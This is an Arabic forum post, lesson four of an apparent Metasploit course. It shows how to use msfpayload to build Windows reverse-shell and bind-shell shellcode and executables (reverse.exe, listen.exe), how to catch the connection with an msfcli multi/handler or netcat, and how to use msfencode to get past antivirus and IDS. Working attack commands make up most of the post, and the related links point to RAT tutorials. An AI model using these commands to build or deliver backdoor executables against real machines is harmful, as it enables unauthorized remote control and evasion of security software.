ايجي الوطن العربي
مرحبا بك فى منتديات ايجى الوطن العربي منتديات الحصريا لكل عام
اذا كنت من الاعضاء يرجى تسجيل الدخول
واذا كنت من الزوار يرجى التقدم بتسجيلك فى المنتدى لمعرفة المزيد يرجى التواصل مع ادارة المنتدى
* يرجى ملئ البيانات بطريقة صحيحة *
-- تحت رعاية --
المجك
ايجي الوطن العربي
مرحبا بك فى منتديات ايجى الوطن العربي منتديات الحصريا لكل عام
اذا كنت من الاعضاء يرجى تسجيل الدخول
واذا كنت من الزوار يرجى التقدم بتسجيلك فى المنتدى لمعرفة المزيد يرجى التواصل مع ادارة المنتدى
* يرجى ملئ البيانات بطريقة صحيحة *
-- تحت رعاية --
المجك
ايجي الوطن العربي
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

ايجي الوطن العربي

كل ما تتوقعه تجده عندنا
 
الرئيسيةأحدث الصورالتسجيلدخول

 

 الدرس الرابع : استخدام msfencode , msfpayload ‏

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin



المساهمات : 149
تاريخ التسجيل : 15/07/2013

الدرس الرابع : استخدام msfencode , msfpayload ‏ Empty
مُساهمةموضوع: الدرس الرابع : استخدام msfencode , msfpayload ‏   الدرس الرابع : استخدام msfencode , msfpayload ‏ Icon_minitimeالثلاثاء يوليو 23, 2013 10:29 am

[b style="font-family:Arial;font-size:16pt;font-weight:bold"][b style="font-family:Arial;font-size:16pt;font-weight:bold"][b style="font-family:Arial;font-size:16pt;font-weight:bold"][b style="font-family:Arial;font-size:16pt;font-weight:bold"]السلام عليكم ورحمه الله وبركاته

اليوم درسنآ يكمل الدرس السابق .

1- msfpayload

msfencode -2


msfpayload : اداه مهمه لعمل الـ shellcode

الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه

سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA

طريقه عمله .
[/b]
[/b]
[/b]
[/b]
كود PHP:
الكود:

./msfpayload payload var=val 



payload = اسم البايلود

var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم

كيف نعرف متغيرات الـ payload ؟

نعرفها عن طريق الامر
كود PHP:
الكود:

 ./msfpayload windows/shell/reverse_tcp  O 



الصوره تتكلم .
الدرس الرابع : استخدام msfencode , msfpayload ‏ YlC63057


local port= lport
البورت الخاص بالمهاجم ,
local host = lhost
ip الخاص بالمهاجم

خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport

bind_shell
الحصول على شل بأتصال مباشر

reverse_shell
الحصول على شل بأتصال عكسي

الان نعمل تطبيق .
كود PHP:
الكود:

 ./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C 



[/QUOTE]

الدرس الرابع : استخدام msfencode , msfpayload ‏ UIA62219

الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload ,

البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access

صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject

طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe

كيف نعمله على صيغه exe , بأستخدام mfspayload .

مثال لعمل exe
كود PHP:
الكود:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe 




طريقه التنصت للاتصال

./
كود PHP:
الكود:

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E 



msfcli راح اشرحها بدرس القادم .


مثال اخر
كود PHP:
الكود:

./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe 



الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

~~~~~~~~~~~~~~~~

msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV

كود PHP:
الكود:

Usage: ./msfencode <options>



OPTIONS:



    -a <opt>  The architecture to encode as

    -b <opt>  The list of characters to avoid: '\x00\xff'

    -c <opt>  The number of times to encode the data

    -e <opt>  The encoder to use

    -h        Help banner

    -i <opt>  Encode the contents of the supplied file path

    -l        List available encoders

    -m <opt>  Specifies an additional module search path

    -n        Dump encoder information

    -o <opt>  The output file

    -p <opt>  The platform to encode for

    -s <opt>  The maximum size of the encoded data

    -t <opt>  The format to display the encoded buffer 

    -x <opt>  Specify an alternate win32 executable template 




الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو

قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي

مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز . الدرس الرابع : استخدام msfencode , msfpayload ‏ Biggrin

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


الان بقى الواجهات
1-msfconsole
msfcli -2
msfgui -3
msfwe b -4

وراح يتم التطرق لها بالدرس القادم .



قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس !

لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟
كود PHP:
الكود:

./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe 



الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

ولماذا > متعوب عليها الدرس الرابع : استخدام msfencode , msfpayload ‏ Biggrin

استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض !

كود PHP:
الكود:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe 




طريقه التنصت للاتصال

./
كود PHP:
الكود:

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E 




الجواب راح تلقونه بالدروس السابقه اذا كنت متابع الدرس الرابع : استخدام msfencode , msfpayload ‏ Biggrin

hint: الجواب 5 كلمات الدرس الرابع : استخدام msfencode , msfpayload ‏ Biggrin

 
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://emadtoemadto.yoo7.com
 
الدرس الرابع : استخدام msfencode , msfpayload ‏
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  [ الدرس العاشر ] : شرح استخدام برنامج SpyNet
»  [ الدرس الثامن ] : شرح استخدام برنامج Poison
» [ الدرس السابع ] : شرح استخدام برنامج BifrosT
»  [الدرس الرابع عشر] : الدمج باكثر من طريقه
» [الدرس الرابع]الكشف عن طريق الجدران الناريه

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
ايجي الوطن العربي  :: [ دورات الـمنتدى ] :: [ دورة الميتاسبلويت ]-
انتقل الى: